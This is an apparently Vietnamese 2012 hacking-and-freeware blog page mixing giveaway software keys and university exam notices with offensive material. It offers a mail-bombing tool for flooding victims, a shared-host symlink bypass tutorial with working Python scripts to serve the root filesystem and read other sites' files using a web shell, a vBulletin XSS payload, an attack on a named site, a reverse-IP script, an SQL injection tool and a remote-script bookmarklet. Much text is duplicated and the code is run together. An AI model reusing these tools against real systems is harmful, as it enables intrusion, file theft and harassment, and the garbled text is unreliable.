Soft mien phi ,hoc tap ,hack website,hack game,tai lieu aptech,du an,project thong tin dai hoc ,ung dung androind
Sunday, June 24, 2012
Share bộ rank mới còn nóng hổi Design by kenhdaihoc.com
Design bởi: "Design Team" kenhdaihoc.com
Link download: http://www.mediafire.com/?v76ys3jgi89gs3v
Pass: wWw.kenhdaihoc.com
Ultima Steganography 1.6 - Phần mềm ẩn dữ liệu bằng mật khẩu trong tập tin ảnh + Key
Ultima Steganography cung cấp cho người dùng một trong những phương pháp hiệu quả nhất để bảo mậtdữ liệu trong Windows. Phần mềm cho phép bạn mã hóa các tập tin quan trọng và đặt chúng trong những bức ảnh thông thường. Và dĩ nhiên, sẽ chẳng ai ngờ đến sự tồn tại của tập tin đó bởi thứ họ nhìn thấy chỉ là một bức ảnh không hơn không kém.
Ultima Steganography có một giao diện người dùng vô cùng đơn giản và dễ sử dụng. Phần mềm cung cấp hai chế độ làm việc bao gồm Hide a file in an image (ẩn tập tin trong một bức ảnh) và Extract hidden file from an image (Giải nén tập tin từ một bức ảnh). Bằng việc thực hiện lần lượt các yêu cầu của phần mềm, bạn sẽ dễ dàng vô hình hóa tập tin với một mật khẩu cho trước để chia sẻ hoặc lưu trữ chúng mà không lo bị phát hiện.
Bản quyền miễn phí Ultima Steganography 1.6
Nhờ chương trình khuyến mãi của Giveaway of the Day, chúng ta được sử dụng Ultima Steganography 1.6 hoàn toàn miễn phí. Rất đơn giản, bạn chỉ cần sử dụng mã bản quyền bên dưới để kích hoạt sử dụng (nút kích hoạt nằm tại mục About của phần mềm):
Registration name: GAOTD
Registration code: 136157-37100-19293652-484400
Tải về Ultima Steganography 1.6 tại đây.Hoặc tại đây: http://kenhdaihoc.com/forum/showthread.php?t=5020
4Media Burner Studio 1.0 - Phân mềm Ghi đĩa chuyên nghiệp + key
4Media Burner Studio 1.0 là công cụ đa năng cho phép bạn thực hiện các thao tác ghi đĩa, sao chép đĩa hay tạo ra những tập tin ảnh ISO một cách nhanh chóng và dễ dàng nhất. Phần mềm tương thích tốt với hầu hết chủng loại đĩa thông thường từ CD-R đến DVD+R DL. Chính vì vậy, 4Media Burner Studio 1.0 có thể là một biện pháp hoàn hảo để thay thế trình ghi đĩa mặc định trên Windows.
4Media Burner Studio 1.0 có cơ chế tự động dò tìm đĩa khá tốt và có thể giúp bạn tẩy trắng dữ liệu trên những loại đĩa RW DVD. Phần mềm có một giao diện khá thông thoáng bao gồm sự thiết kế khá rõ ràng của những nút chức năng.
Các tính năng chính của 4Media Burner Studio 1.0
- Ghi dữ liệu đa phương tiện, các tập tin có khả năng boot, dữ liệu cá nhân lên các đĩa CD/DVD thông dụng như CD-R, CD-RW, DVD-R, DVD+R, DVD-RW, DVD+RW, DVD+R DL.
- Tạo và chỉnh sửa các tập tin ảnh có đuôi .ISO.
- Xóa dữ liệu trên các đĩa RW.
Bản quyền miễn phí 4Media Burner Studio 1.0
Với chương trình khuyến mãi bản quyền đến từ Giveaway of the Day, chúng ta được sử dụng miễn phí 4Media Burner Studio 1.0 mà không phải bỏ ra $39,99.
[DOWNLOAD]Bạn chỉ cần tải về bản cài đặt của phần mềm tại đây[/DOWNLOAD]Key: F199B84B-1B66-4B45-A667F-BB59-BDEC-6837
Sound Editor Pro 7.0 - Phần mềm biên tập âm thanh + Key
Sound Editor Pro là công cụ cho phép bạn thực hiện thao tác biên tập và chỉnh sửa âm thanh, giọng nói, các tập tin nhạc một cách chuyên nghiệp nhất. Bạn có thể áp dụng các hiệu ứng thêm tiếng vang cũng như giảm tiếng ồn đồng thời cắt, sao chép hay dán phần ghi âm nếu cần thiết.
Sound Editor Pro làm việc tốt nhất trên các tập tin âm thanh .wav hoặc .mp3 nhưng phần mềm cũng hỗ trợ một số định dạng tập tin khác bao gồm .vox, gsm, au, aif, ogg, wmv và nhiều hơn thế nữa.
Phần mềm có một giao diện người dùng dạng timeline với khá nhiều menu chức năng đủ để bạn áp dụng hàng loạt hiệu ứng âm thanh tùy thích cũng cắt ghép chúng theo ý muốn bất kỳ.
Các tính năng chính của Sound Editor Pro
- Sở hữu những chức năng của một trình chỉnh sửa âm thanh bao gồm cắt, sao chép, chèn, autotrim,…
- Áp dụng rất nhiều hiệu ứng âm thanh chuyên nghiệp như khuếch đại âm, cân bằng, đảo ngược,…
- Cơ chế xử lý hàng loạt tập tin lên tới con số 32000!
- Bao gồm công cụ phân tích chi tiết dạng quang phổ âm thanh (FFT) và tổng hợp lời nói (Text-to-speech).
- Hỗ trợ ghi âm Autotimer và ghi âm giọng nói,…
- Rip đĩa CD nhạc với tốc độ truy xuất cực nhanh.
- Giao diện dễ sử dụng mà bạn sẽ dễ dàng thành thạo chỉ trong vài phút.
Bản quyền miễn phí Sound Editor Pro 7.0
Bạn chỉ cần sử dụng những thông tin dưới đây để kích hoạt bản quyền miễn phí mà không phải mất $29,95.
User name: giveawayoftheday.com
Registration Key: SEP-SDYF8-DJF45-879UJ-JSD43
Chương trình khuyến mãi được hợp tác bởi NCMedia và Giveaway of the Day.
Mời bạn tải về Sound Editor Pro 7.0 tại đây.
Tuyển sinh 2012: Phòng thi, số báo danh thí sinh được đưa lên mạng
Để tiện cho thí sinh tra cứu thông tin về tuyển sinh đại học năm 2012, nhiều trường đại học đưa phòng thi, số báo danh của thí sinh lên mạng.
| Ảnh minh họa |
ĐH Kinh tế quốc dân công bố số báo danh của thí sinh trên trang web của trường. Thí sinh có thể vào http://www.kha.neu.edu.vn/ để tra cứu thông tin dự thi đại học năm 2012.
ĐH Thái Nguyên cũng cho biết, thí sinh có thể tra cứu thông tin về số báo danh, phòng, địa điểm thi của mình tại mục tuyển sinh 2012 / thông tin số báo danh, phòng thi hoặc tại địa chỉ http://tuyensinh.tnu.edu.vn/ .
Nếu phát hiện thấy có sai sót đề nghị yêu cầu sửa chữa ngay trong buổi làm thủ tục dự thi. Những thí sinh không nhận được giấy báo dự thi do thất lạc, mang phiếu số 02 và CMTND đến phòng thi để làm thủ tục dự thi.
Theo đó, thời gian làm thủ tục dự thi: Đợt 1: 08 giờ 00 phút, ngày 03/7/2012; Đợt 2: 08 giờ 00 phút, ngày 08/7/2012 .
Theo báo cáo của Hội đồng tuyển sinh ĐH Thái Nguyên, đến thời điểm này trường đã hoàn tất các khâu tổ chức và sẵn sàng cho kỳ thi tuyển sinh năm 2012.
Kỳ thi tuyển sinh năm nay, ĐH Thái Nguyên có số lượng hồ sơ đăng ký dự thi là 51.726. Trong đó, khối A có 18.516 hồ sơ; khối A1 có 2.013 hồ sơ; khối B có 20.888 hồ sơ; khối C có 4.133 hồ sơ; khối D có 4.705 hồ sơ; khối M có 942 hồ sơ; khối T có 430 hồ sơ; khối H có 43 hồ sơ và khối N có 55 hồ sơ.
Cụ thể, số thí sinh đăng ký dự thi vào các trường đại học thành viên và các khoa trực thuộc ĐH Thái Nguyên như sau: Trường ĐH Sư phạm có 9.096 hồ sơ; Trường ĐH Kỹ thuật Công nghiệp có 6.999 hồ sơ; Trường ĐH Nông Lâm có 9.340 hồ sơ; Trường ĐH Y – Dược có 12.558 hồ sơ; Trường ĐH Kinh tế và Quản trị Kinh doanh có 6.992 hồ sơ;
Trường ĐH Khoa học có 2.855 hồ sơ; Trường ĐH Công nghệ Thông tin và Truyền thông có 2.261 hồ sơ; Khoa Ngoại ngữ có 955 hồ sơ; Khoa Quốc tế có 88 hồ sơ và trường Cao đẳng Kinh tế - Kỹ thuật có 414 hồ sơ. Ngoài ra còn có 167 hồ sơ đăng ký vào hệ Cao đẳng của Trường ĐH Y – Dược và Khoa Ngoại ngữ.
Có 2.543 thí sinh đăng ký dự thi nhờ vào các trường Đại học, Cao đẳng không tổ chức thi tuyển sinh. Tổng số thí sinh đăng ký dự thi tại Hội đồng thi ĐHTN là 54.268. Số thí sinh đăng ký dự thi sẽ được bố trí thi ở 1.411 phòng thi.
Trong đó, đợt 1 (Khối A, A1) tổng số có 21.409 thí sinh được bố trí thi ở 650 phòng thi tại 12 điểm thi. Đợt 2 (các khối B,C,D,M,T,N,H) tổng số có 32.859 thí sinh, được bố trí thi ở 851 phòng thi, tại 22 điểm thi.
Học Viện Công Nghệ Bưu Chính Viễn Thông cũng cho biết, Thí sinh đã nộp hồ sơ đăng ký dự thi tuyển sinh Đại học, Cao đẳng chính quy năm 2012 của trường có thể tra cứu những thông tin về số số báo danh, phòng thi, cụm thi, địa điểm thi, ngành đăng ký dự thi tại đây http://203.162.88.117:81/tracuu.aspx?id=4
Trường ĐH Kinh tế- Luật (ĐH Quốc gia TPHCM) cũng thông báo cho thí sinh biết có thể tra cứu số báo danh trên http://www.uel.edu.vn/Default.aspx?ArticleId=e705729f-5292-478c-80d6-9e406754cde9 .
Tuyển sinh 2012: Phòng thi, số báo danh thí sinh được đưa lên mạng
Để tiện cho thí sinh tra cứu thông tin về tuyển sinh đại học năm 2012, nhiều trường đại học đưa phòng thi, số báo danh của thí sinh lên mạng.
| Ảnh minh họa |
ĐH Kinh tế quốc dân công bố số báo danh của thí sinh trên trang web của trường. Thí sinh có thể vào http://www.kha.neu.edu.vn/ để tra cứu thông tin dự thi đại học năm 2012.
ĐH Thái Nguyên cũng cho biết, thí sinh có thể tra cứu thông tin về số báo danh, phòng, địa điểm thi của mình tại mục tuyển sinh 2012 / thông tin số báo danh, phòng thi hoặc tại địa chỉ http://tuyensinh.tnu.edu.vn/ .
Nếu phát hiện thấy có sai sót đề nghị yêu cầu sửa chữa ngay trong buổi làm thủ tục dự thi. Những thí sinh không nhận được giấy báo dự thi do thất lạc, mang phiếu số 02 và CMTND đến phòng thi để làm thủ tục dự thi.
Theo đó, thời gian làm thủ tục dự thi: Đợt 1: 08 giờ 00 phút, ngày 03/7/2012; Đợt 2: 08 giờ 00 phút, ngày 08/7/2012 .
Theo báo cáo của Hội đồng tuyển sinh ĐH Thái Nguyên, đến thời điểm này trường đã hoàn tất các khâu tổ chức và sẵn sàng cho kỳ thi tuyển sinh năm 2012.
Kỳ thi tuyển sinh năm nay, ĐH Thái Nguyên có số lượng hồ sơ đăng ký dự thi là 51.726. Trong đó, khối A có 18.516 hồ sơ; khối A1 có 2.013 hồ sơ; khối B có 20.888 hồ sơ; khối C có 4.133 hồ sơ; khối D có 4.705 hồ sơ; khối M có 942 hồ sơ; khối T có 430 hồ sơ; khối H có 43 hồ sơ và khối N có 55 hồ sơ.
Cụ thể, số thí sinh đăng ký dự thi vào các trường đại học thành viên và các khoa trực thuộc ĐH Thái Nguyên như sau: Trường ĐH Sư phạm có 9.096 hồ sơ; Trường ĐH Kỹ thuật Công nghiệp có 6.999 hồ sơ; Trường ĐH Nông Lâm có 9.340 hồ sơ; Trường ĐH Y – Dược có 12.558 hồ sơ; Trường ĐH Kinh tế và Quản trị Kinh doanh có 6.992 hồ sơ;
Trường ĐH Khoa học có 2.855 hồ sơ; Trường ĐH Công nghệ Thông tin và Truyền thông có 2.261 hồ sơ; Khoa Ngoại ngữ có 955 hồ sơ; Khoa Quốc tế có 88 hồ sơ và trường Cao đẳng Kinh tế - Kỹ thuật có 414 hồ sơ. Ngoài ra còn có 167 hồ sơ đăng ký vào hệ Cao đẳng của Trường ĐH Y – Dược và Khoa Ngoại ngữ.
Có 2.543 thí sinh đăng ký dự thi nhờ vào các trường Đại học, Cao đẳng không tổ chức thi tuyển sinh. Tổng số thí sinh đăng ký dự thi tại Hội đồng thi ĐHTN là 54.268. Số thí sinh đăng ký dự thi sẽ được bố trí thi ở 1.411 phòng thi.
Trong đó, đợt 1 (Khối A, A1) tổng số có 21.409 thí sinh được bố trí thi ở 650 phòng thi tại 12 điểm thi. Đợt 2 (các khối B,C,D,M,T,N,H) tổng số có 32.859 thí sinh, được bố trí thi ở 851 phòng thi, tại 22 điểm thi.
Học Viện Công Nghệ Bưu Chính Viễn Thông cũng cho biết, Thí sinh đã nộp hồ sơ đăng ký dự thi tuyển sinh Đại học, Cao đẳng chính quy năm 2012 của trường có thể tra cứu những thông tin về số số báo danh, phòng thi, cụm thi, địa điểm thi, ngành đăng ký dự thi tại đây http://203.162.88.117:81/tracuu.aspx?id=4
Trường ĐH Kinh tế- Luật (ĐH Quốc gia TPHCM) cũng thông báo cho thí sinh biết có thể tra cứu số báo danh trên http://www.uel.edu.vn/Default.aspx?ArticleId=e705729f-5292-478c-80d6-9e406754cde9 .
Tool Bom Mail MaxBomber
Tool Bom Mail Good MaxBomber:
Hình ảnh demo victim bị tấn công:
+ Tool boom mail rất tốt với tính năng mỗi lần gửi chủ đề khác nhau bằng cách tự động thêm các mã khác nhau nên không bị trùng và gộp lại thành 1 mail và vào inbox 100%
- + Tốc độ tấn công: tầm 30 mail / phút.
- + Có thể sử dụng nhiều mail tấn công 1 mail và dấn đến tình trạng ngập lụt è Mail victim có thể bị khóa tạm thời đến vĩnh viễn.
Link download:
http://www.mediafire.com/?bbfxq2yqfhbfkkr
Pass download: ceh.vn
Pass bảo vệ: soleil_vhb
p/s: cài đặt file dotNetFx40_Full_setup.exe nếu tool báo lỗi.
Kiểm tra virus: http://virusscan.jotti.org/en/scanresult/b2d31269789443142087fef4d09564c246243ea7/aac03a3ce1f2bebc5109d298abcf1ab2307a17ee Server Bypass via Symlink - Jumping in server
==================================================
#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()http://pastebin.com/PddvszKC
Next u wil need to run the webs.py script by following command
open the site with port 13123
site.com:13123




User the tool to view folders where not have any permission to read inside
python xplor.py /var/www/index.php
View the files in no access folder .
python xplor.py /var/www/index.php
copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg

And yeah file it's here

Yeahh fucking access it's granted
Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl
enjoy it :)
As we all know, symlinking it's on of greates methods for bypassing server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
For getting success with this tutorial are required the following things:
- Python Installed on Server
- b374k.php shell
- And some scripts u will see below.
This idea have start from devilzc0de geeks and let me explain how it work.
here we are in folder
/var/www/here we are in folder
dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as
webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
Next u wil need to run the webs.py script by following command
python webs.py
open the site with port 13123
site.com:13123
Let's go with next method of symlink server bypassing , like u see and into before post now i will explain a new trick with an other tool.
http://www.flashcrew.in/2012/05/serv...umping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
http://www.flashcrew.in/2012/05/serv...umping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
http://pastebin.com/WqmCE2sJ # devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
testing the script
python xplor.pyUser the tool to view folders where not have any permission to read inside
python xplor.py /var/www/index.php
View the files in no access folder .
python xplor.py /var/www/index.php
copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg
And yeah file it's here
Yeahh fucking access it's granted
Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl
enjoy it :)
[TUT] Bug validator.php trong vBulletin
TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php
Tác Giả: Nobody
Link down:
Tác Giả: Nobody
Link down:
http://www.mediafire.com/?ntrngjdzczjĐây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB.
[TUT] Bug validator.php trong vBulletin
TUT hướng dẫn bug tấn công vào icare.com.vn qua file Validator.php
Tác Giả: Nobody
Link down:
Tác Giả: Nobody
Link down:
http://www.mediafire.com/?ntrngjdzczjĐây cùng do sự bất cẩn của admin quên chưa xóa fle Validator.php file này có khả năng view hệ các file và thư mục của vBB.
Tài liệu hướng dẫn về Back Track 5 - Tiếng Việt
Tài liệu hướng dẫn sử dụng Back Track 5 - Tiếng Việt:
Pass download :
Pass download :
hcegroup
vBulletin 4.1.12 - Cross Site Scripting
[ TITLE ....... ][ vBulletin 4.1.12 Reflected XSS (try csrf*) for registered users
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http:/.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it!
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.
(* ..., because I think this could be extended to attack
with 'non-visible button'.
)
[--------------------------------------------[
[ 3. Where is bug
When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.
Try to add Ax85+"><xss><
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http:/.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it!
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.
(* ..., because I think this could be extended to attack
with 'non-visible button'.
[--------------------------------------------[
[ 3. Where is bug
When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.
Try to add Ax85+"><xss><
vBulletin 4.1.12 - Cross Site Scripting
[ TITLE ....... ][ vBulletin 4.1.12 Reflected XSS (try csrf*) for registered users
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http:/.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it!
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.
(* ..., because I think this could be extended to attack
with 'non-visible button'.
)
[--------------------------------------------[
[ 3. Where is bug
When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.
Try to add Ax85+"><xss><
[ DATE ........ ][ 24.04.2012
[ AUTOHR ...... ][ http:/.blogspot.com
[ SOFT LINK ... ][ http://www.vbulletin.com
[ VERSION ..... ][ 4.1.12
[ TESTED ON ... ][ LAMP
[ ----------------------------------------------------------------------- [
[ 1. What is this?
[ 2. What is the type of vulnerability?
[ 3. Where is bug
[ 4. More...
[--------------------------------------------[
[ 1. What is this?
This is very nice CMS, You should try it!
[--------------------------------------------[
[ 2. What is the type of vulnerability?
Reflected cross-site scripting.
(* ..., because I think this could be extended to attack
with 'non-visible button'.
[--------------------------------------------[
[ 3. Where is bug
When You are logged-in as a normal user, You can add post to forum.
You can add title (parameter "subject") of Your post only with 85 characters.
And that's the trick, because error displayed to user (if 'subject' is > 85 chars)
can contain XSS code.
Try to add Ax85+"><xss><
[Python] Reverse IP v1.0
Chú ý: nhớ tạo folder "result" và có quyền write để lưu kết quả sau khi hoàn thành nhéimportsysimporthttplibimportrefromurlparseimporturlparseimporturllibimportsocketappid='8F0213E2A58E37683CEBB707DDE557F920F12806'#_MLwebcount=50defhttp(method,url,params='',headers=''):url_parse=urlparse(url)host=url_parse[1]path=url_parse[2]query=url_parse[4]http=httplib.HTTPConnection(host)ifmethod=='GET':http.request(method,path+'?'+query)elifmethod=='POST':http.request(method,path,params,headers)res=http.getresponse()result=res.read()http.close()returnresultdefretdomain(x):parse_domain=urlparse(x)returnparse_domain[1].replace('www.','')'-'*50'# RevIP v1.0''# auth0r: _ML''-'*50if(len(sys.argv)>1):target=sys.argv[1];"Processing..."ip=socket.gethostbyname(parsetarget[1])target+' ==> '+ipifip=='': sys.exit('failed')list_result=[]url='http://api.bing.com/xml.aspx?Appid='+appid+'&query=ip:'+ip+'&sources=web&web.count='+str(webcount)+'&web.offest=0'page=http('GET',url)total=re.search('<web:Total>([0-9]+)<\/web:Total>',page)total=total.group(1)totalpage=int(total)/50+1###################################################'[-] target: '+targetforiinrange(0,totalpage+1):url='http://api.bing.com/xml.aspx?Appid='+appid+'&query=ip:'+ip+'&sources=web&web.count='+str(webcount)+'&web.offest='+str(webcount*i)page=http('GET',url)get_url=re.findall(r'<web:Url>(.+?)<\/web:Url>',page)forginget_url: list_result.append(retdomain(g))result=set(list_result)i=0parselog=urlparse(target)fw=open('./result/'+str(parselog[1])+'.txt','a')fw.write('[-] target: '+target+'\r\n\r\n')forrinresult:fw.write(' ['+str(i)+'] '+r+'\r\n')' ['+str(i)+'] '+ri+=1fw.write('\r\n\r\n')fw.close()else:'usage: python revip.py #target(ip|domain)'
Code:
Example:
python revip.py http://victim.com
python revip.py 123.456.789.000
[Python] Reverse IP v1.0
Chú ý: nhớ tạo folder "result" và có quyền write để lưu kết quả sau khi hoàn thành nhéimportsysimporthttplibimportrefromurlparseimporturlparseimporturllibimportsocketappid='8F0213E2A58E37683CEBB707DDE557F920F12806'#_MLwebcount=50defhttp(method,url,params='',headers=''):url_parse=urlparse(url)host=url_parse[1]path=url_parse[2]query=url_parse[4]http=httplib.HTTPConnection(host)ifmethod=='GET':http.request(method,path+'?'+query)elifmethod=='POST':http.request(method,path,params,headers)res=http.getresponse()result=res.read()http.close()returnresultdefretdomain(x):parse_domain=urlparse(x)returnparse_domain[1].replace('www.','')'-'*50'# RevIP v1.0''# auth0r: _ML''-'*50if(len(sys.argv)>1):target=sys.argv[1];"Processing..."ip=socket.gethostbyname(parsetarget[1])target+' ==> '+ipifip=='': sys.exit('failed')list_result=[]url='http://api.bing.com/xml.aspx?Appid='+appid+'&query=ip:'+ip+'&sources=web&web.count='+str(webcount)+'&web.offest=0'page=http('GET',url)total=re.search('<web:Total>([0-9]+)<\/web:Total>',page)total=total.group(1)totalpage=int(total)/50+1###################################################'[-] target: '+targetforiinrange(0,totalpage+1):url='http://api.bing.com/xml.aspx?Appid='+appid+'&query=ip:'+ip+'&sources=web&web.count='+str(webcount)+'&web.offest='+str(webcount*i)page=http('GET',url)get_url=re.findall(r'<web:Url>(.+?)<\/web:Url>',page)forginget_url: list_result.append(retdomain(g))result=set(list_result)i=0parselog=urlparse(target)fw=open('./result/'+str(parselog[1])+'.txt','a')fw.write('[-] target: '+target+'\r\n\r\n')forrinresult:fw.write(' ['+str(i)+'] '+r+'\r\n')' ['+str(i)+'] '+ri+=1fw.write('\r\n\r\n')fw.close()else:'usage: python revip.py #target(ip|domain)'
Code:
Example:
python revip.py http://victim.com
python revip.py 123.456.789.000
Blind Cat - Blind SQL Injection Exploitation tool
The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

The tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

The tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.
Download
http://itsecuritylab.eu/files/blind_cat/blind_cat.zip
Source
http://tools.thehackernews.com/2012/06/blind-cat-blind-sql-injection.html
Blind Cat - Blind SQL Injection Exploitation tool
The experimental multithreaded tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

The tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.

The tool (Blind Cat) is running multiple instances of CURL, which send parametrized HTTP requests to the vulnerable web application. Then responses are analyzed and another requests with modified parameters are issued until the correct characters in SQL response are detected.
Download
http://itsecuritylab.eu/files/blind_cat/blind_cat.zip
Source
http://tools.thehackernews.com/2012/06/blind-cat-blind-sql-injection.html
Code Auto SQL Injection (Update)
Download Code:
javascript:void(function(){var%20js=document.creat eElement('script');js.type='text/javascript';js.src='http://www.website.com/sqli.js';document.head.appendChild(js);}());
Code Auto SQL Injection (Update)
Download Code:
javascript:void(function(){var%20js=document.creat eElement('script');js.type='text/javascript';js.src='http://www.website.com/sqli.js';document.head.appendChild(js);}());




